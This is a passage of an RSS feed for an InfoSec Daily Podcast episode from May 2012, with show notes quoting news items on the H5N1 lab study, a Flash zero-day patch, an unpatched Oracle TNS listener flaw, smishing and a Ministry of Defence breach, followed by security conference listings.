<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon UK:</span><img height="138px;" src="https://lh6.googleusercontent.com/-BzOFlEdSOanWs7zzhFpLAGKKJ3FPCLi2z7vRkrOMBoMYPHJAyC8dmID__2YrrOKNClZJWGvqrCu_QV7ot20aDtFFUddyjOwlevurQovInYYNTrbv4c" width="138px;" /></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p><b id="internal-source-marker_0.27794996183365583"><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2012/05/03/h4n1_flu_study_published/"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.theregister.co.uk/2012/05/03/h4n1_flu_study_published/</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Strains of bird flu that could spread among humans have been created in the lab &#8211; and now full details on just how this was done have been </span><a href="http://www.nature.com/nature/journal/vaop/ncurrent/full/nature10831.html"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">published openly</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, raising fears that the research could be used by terrorists to craft a deadly bio-weapon plague.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Bird flu, or H5N1, has killed more than half of the 600 people it is known to have infected, but it cannot spread easily between people. So Yoshihiro Kawaoka of the University of Wisconsin-Madison set out to find whether H5N1 could evolve in the wild into a form that was transmissible between humans.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Kawaoka&rsquo;s FBI-approved team first created thousands of mutant versions of H5N1. From these they identified a version that could stick to cells in the human nose and throat and then combined this with the strain from the wild that caused the 2009 pandemic. With this hybrid virus, the scientists infected ferrets and watched for when the virus evolved a strain that could spread through the air and infect healthy ferrets in neighbouring cages.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">According to Kawaoka, the study shows that relatively few mutations are required for the virus to acquire the ability to transmit between mammals, including humans. The strain created during Kawaoka&rsquo;s research is less severe than the one that caused the 2009 pandemic, it is susceptible to Tamiflu and it did not kill any of the ferrets in the experiments.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">But there may be further strains not studied that have the ability to evolve transmissibility. In fact, the researchers have already spotted strains with one of the mutations they identified in Egypt. As Laurence Fishburne&rsquo;s character in Contagion says: &ldquo;Someone doesn&rsquo;t need to weaponise the bird flu. The birds are doing that.&rdquo;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: 'Droid Serif'; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="https://www.adobe.com/support/security/bulletins/apsb12-09.html"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">https://www.adobe.com/support/security/bulletins/apsb12-09.html</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Adobe released security updates for Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux, Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x. These updates address an object confusion vulnerability (CVE-2012-0779) that could cause the application to crash and potentially allow an attacker to take control of the affected system.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">There are reports that the vulnerability is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious file delivered in an email message. The exploit targets Flash Player on Internet Explorer for Windows only.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: 'Droid Serif'; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://searchsecurity.techtarget.com/news/2240149475/Oracle-wont-patch-four-year-old-zero-day-in-TNS-listener"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://searchsecurity.techtarget.com/news/2240149475/Oracle-wont-patch-four-year-old-zero-day-in-TNS-listener</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Oracle has issued a security bulletin this week, recommending customers consider workarounds to address a long-standing zero-day vulnerability in nearly all versions of its database management system.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The four-year-old Oracle database vulnerability became an issue last week when the researcher who discovered the flaw issued details and proof-of-concept code to carry out a &ldquo;</span><a href="https://blogs.oracle.com/security/entry/security_alert_for_cve_2012"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">TNS listener poison attack</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.&rdquo; Joxean Koret, a security researcher based in Spain, reported the vulnerability to Oracle in 2008. According to Oracle&rsquo;s blog, last week Koret, &ldquo;[had] mistakenly, assuming that the issue had been backported through the CPU&hellip; fully disclosed its details.&rdquo;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The Transparent Network Substrate (TNS) Listener is a feature that routes the connections between a client and the server. According to</span><a href="http://www.joxeankoret.com/download/tnspoison.pdf"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Koret&rsquo;s advisory</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> (.pdf), an attacker using a man-in-the-middle technique could hijack legitimate established connections and route all the data being sent from the client to a remote server controlled by the attacker. Without authorization, the attacker could record the data or send simple commands to the server to add, drop or modify data.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&ldquo;To inject commands, simply wait for the customer to send an SQL query/statement, replace the contents of the statement with our desired command and that&#39;s all,&rdquo; Koret wrote in his blog and in a message on the</span><a href="http://seclists.org/fulldisclosure/2012/Apr/204"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Full Disclosure mailing list</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The vulnerability is present in Oracle database versions 10.2.0.3 to 11.2.0.3.</span><a href="http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> The Oracle alert</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> for CVE-2012-1675 also warns that &ldquo;since Oracle Fusion Middleware, Oracle Enterprise Manager, Oracle E-Business Suite include the Oracle database component that is affected by this vulnerability, Oracle recommends that customers apply the solution for this vulnerability to the Oracle database component.&rdquo;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Alex Rothacker, director of security research at TeamSHATTER, Application Security Inc.&#39;s research team, said Koret was more patient than other researchers before disclosing his proof-of-concept code. A lack of clarity by Oracle on whether the bug was fixed lead to the disclosure, and Rothacker believes that Koret acted &ldquo;in good faith.&rdquo;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Oracle had not yet patched the bug and said it has no plans to, stating that &ldquo;such backporting is very difficult or impossible because of the amount of code change required, or because the fix would create significant regressions&hellip;&rdquo; The problem has been fixed in the main line of code, according to Rothacker, so new versions of the Oracle database will be secured against this vulnerability.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Rothacker suggests the real problem has nothing to do with the miscommunication that led to the attack code being released. The problem, he said, is that Oracle has known about this very serious vulnerability for four years and done nothing to fix it. &ldquo;How many other problems do they know about that they haven&rsquo;t fixed?&rdquo; he asked.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: 'Droid Serif'; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.pcworld.com/businesscenter/article/254979/smishing_attacks_are_on_the_rise.html"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.pcworld.com/businesscenter/article/254979/smishing_attacks_are_on_the_rise.html</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Text messaging is the most common non-voice use of a mobile phone. There are trillions of text messages received around the world each day, and an increasing</span><a href="http://www.pcworld.com/businesscenter/article/245765/uk_cracks_down_on_claims_industry_sms_spam.html"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> number of them are spam</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, or phishing attacks of some sort. <span class="Apple-tab-span" style="white-space: pre; "> </span> <span class="Apple-tab-span" style="white-space: pre; "> </span> <span class="Apple-tab-span" style="white-space: pre; "> </span><span class="Apple-tab-span" style="white-space: pre; "> </span> <span class="Apple-tab-span" style="white-space: pre; "> </span> <span class="Apple-tab-span" style="white-space: pre; "> </span><span class="Apple-tab-span" style="white-space: pre; "> </span></span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A report from the</span><a href="http://pewinternet.org/Reports/2011/Cell-Phone-Texting-2011/Main-Report.aspx"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Pew Internet and American Life Project</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> claims that 73 percent of adults with a mobile phone use text messaging&#8211;sending and receiving an average of 41.5 messages per day. That average jumps to a startling 110 messages per day for individuals between 18 and 24.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Think twice about clicking that link in the suspicious text message.Cyber criminals are good at identifying lucrative markets and targeting weak links. Users are conditioned to recognize suspicious messages and security threats on PCs, and there&rsquo;s generally security software in place to detect and prevent attacks. But, many people assume mobile phones are inherently safe, and don&rsquo;t realize that malware and phishing attacks are a concern for mobile devices as well.<span class="Apple-tab-span" style="white-space: pre; "> </span> <span class="Apple-tab-span" style="white-space: pre; "> </span> <span class="Apple-tab-span" style="white-space: pre; "> </span><span class="Apple-tab-span" style="white-space: pre; "> </span></span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">People are used to receiving text messages, and are not likely to think twice about the security implications of clicking on a link in a text. The major Web browsers have phishing protection built in to alert the user to suspicious sites, and users can generally hover over a link to display the true URL on a PC, but mobile phones aren&rsquo;t equipped to help users avoid malicious text messages.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: 'Droid Serif'; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.guardian.co.uk/technology/2012/may/03/hackers-breached-secret-mod-systems"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.guardian.co.uk/technology/2012/may/03/hackers-breached-secret-mod-systems</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Computer hackers have managed to breach some of the top secret systems within the Ministry of Defence, the military&#39;s head of cyber-security has revealed.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Major General Jonathan Shaw told the Guardian the number of successful attacks was hard to quantify but they had added urgency to efforts to beef up protection around the MoD&#39;s networks.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;The number of serious incidents is quite small, but it is there,&quot; he said. &quot;And those are the ones we know about. The likelihood is there are problems in there we don&#39;t know about.&quot;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Government computer systems come under daily attack, but though Shaw would not say how or by whom, this is the first admission that the MoD&#39;s own systems have been breached.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The</span><a href="http://www.guardian.co.uk/technology/2012/may/03/soca-website-shut-down-hackers"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Serious Organised Crime Agency, took its website offline on Wednesday night</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> after becoming the target of a cyber-attack. A spokesman said the attack did not pose a security risk to the organisation.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Shaw, a veteran of the Falklands and Iraq wars, also said the MoD had to be prepared to embrace unconventional and &quot;wacky&quot; ideas if the military wanted to catch up with, and then stay ahead of, rivals in the cybersphere. Getting &quot;kids on the street&quot; to help the military was vital, he said.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;My generation &nbsp;&hellip; we are far too old for this; it is not what we have grown up with. Our natural recourse is to reach for a pen and paper. And although we can set up structures, we really need to be on listening mode for this one.&quot;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">He added: &quot;If we want to work the response, if we want to know really what is happening, we really have to listen to the young kids out in the street. They are telling us what is happening out there.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;That will pose a real challenge to us. This thing is moving too fast. The only people who spot what is happening are people at the coal face and that is the young kids. We have to listen to them and they have to talk to us.&quot;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A former director of UK special forces, Shaw, 54, said he thought the military could learn a trick or two from firms such as Facebook.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The company has a</span><a href="http://www.facebook.com/whitehat"><span style="font-size: 13px; font-family: Arial; color: rgb(17, 85, 204); font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> &quot;white hat&quot; programme</span></a><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> in which hackers are paid rewards for informing them when they have found a security vulnerability.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Nine people in the UK have been paid a total of $11,000 (&pound;6,785) for working with Facebook. Shaw said this was the kind of &quot;waacky idea we need to bring in&quot;.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Shaw has spent the last year reviewing the MoD&#39;s approach to cyber-security, and the kind of cyber-capability the military will need in the future.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">He says next year&#39;s MoD budget is expected to include new money for cyber-defence &ndash; an acknowledgment that even during a time of redundancies and squeezed budgets, this is now a priority.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: 'Droid Serif'; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.27794996183365583"><span style="font-size: 13px; font-family: Arial; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">[end]</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-660-beginning-of-the-end-flash-0day-no-oracle-patch-smishing-and-lotsa-arrest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3893/0/infosec-daily-podcast-episode-660.mp3" length="21149655" type="audio/mpeg" />
		<itunes:duration>0:44:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 660 for May 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.

	
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 201[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 660 for May 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.

	
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org

	
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/

	
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014

	
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training

	
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com

	
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 

	
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 

	
Please consider making your Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.

	
Stories
Source: &#160;http://www.theregister.co.uk/2012/05/03/h4n1_flu_study_published/
Strains of bird flu that could spread among humans have been created in the lab &#8211; and now full details on just how this was done have been published openly, raising fears that the research could be used by terrorists to craft a deadly bio-weapon plague.
Bird flu, or H5N1, has killed more than half of the 600 people it is known to have infected, but it cannot spread easily between people. So Yoshihiro Kawaoka of the University of Wisconsin-Madison set out to find whether H5N1 could evolve in the wild into a form that was transmissible between humans.
Kawaoka&#8217;s FBI-approved team first created thousands of mutant versions of H5N1. From these they identified a version that could stick to cells in the human nose and throat and then combined this with the strain from the wild that caused the 2009 pandemic. With this hybrid virus, the scientists infected ferrets and watched for when the virus evolved a strain that could spread through the air and infect healthy ferrets in neighbouring cages.
According to Kawaoka, the study shows that relatively few mutations are required for the virus to acquire the ability to transmit between mammals, including humans. The strain created during Kawaoka&#8217;s research is less severe than the one that caused the 2009 pandemic, it is susceptible to Tamiflu and it did not kill any of the ferrets in the experiments.
But there may be further strains not studied that have the ability to evolve transmissibility. In fact, the researchers have already spotted strains with one of the mutations they identified in Egypt. As Laurence Fishburne&#8217;s character in Contagion says: &#8220;Someone doesn&#8217;t need to weaponise the bird flu. The birds are doing that.&#8221;
&#8230;.
Source: &#160;https://www.adobe.com/support/security/bulletins/apsb12-09.html
Adobe released security updates for Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux, Adobe Flash Player 11.1.115.7 and earlier[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 659 &#8211; Lone Protester, MS Finding Mac Bugs, Mystery Group, BART, and and Dropping Chinese</title>
		<link>http://www.isdpodcast.com/episode-659-lone-protester-ms-finding-mac-bugs-mystery-group-bart-and-and-dropping-chinese</link>
		<comments>http://www.isdpodcast.com/episode-659-lone-protester-ms-finding-mac-bugs-mystery-group-bart-and-and-dropping-chinese#comments</comments>
		<pubDate>Fri, 04 May 2012 00:45:38 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3887</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 659 for May 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez. Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012 Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org AIDE 2012 When: May 21-25, [...]]]></description>
